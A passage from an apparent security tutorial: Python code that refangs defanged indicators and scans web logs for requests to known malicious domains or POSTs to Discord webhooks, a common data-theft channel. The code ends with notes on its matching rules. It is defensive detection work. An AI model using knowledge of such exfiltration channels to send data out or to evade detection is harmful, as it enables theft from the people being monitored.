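    """Turn a defanged indicator such as 'evil[.]com' back into 'evil.com'."""
    return indicator.replace("[.]", ".").replace("hxxp", "http").lower()


def host_matches(host: str, iocs: set[str]) -> bool:
    """True if host equals an IOC domain or is a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == ioc or host.endswith("." + ioc) for ioc in iocs)


def scan_log(lines: Iterable[str], iocs: set[str]) -> list[dict]:
    """Return one hit per log line that touches an IOC domain or posts to a webhook."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # skip malformed lines rather than failing the whole scan
        ts, client, method, url = m.groups()
        hm = URL_HOST_RE.match(url)
        host = hm.group(1) if hm else ""
        if host_matches(host, iocs):
            hits.append({"ts": ts, "client": client, "reason": "ioc-domain", "host": host})
        elif method.upper() == "POST" and WEBHOOK_RE.match(url):
            hits.append({"ts": ts, "client": client, "reason": "discord-webhook-post", "host": host})
    return hits


def main() -> None:
    iocs = {refang(i) for i in DEFANGED_IOCS}
    for hit in scan_log(SAMPLE_LOG.splitlines(), iocs):
        print(hit)


if __name__ == "__main__":
    main()
```

The subdomain match matters because the templated sites are hosted on shared platforms (blogspot, pages.dev) and may be reached via `www.` or other prefixes; the webhook rule is deliberately limited to POST requests so that ordinary Discord CDN downloads do not trigger it.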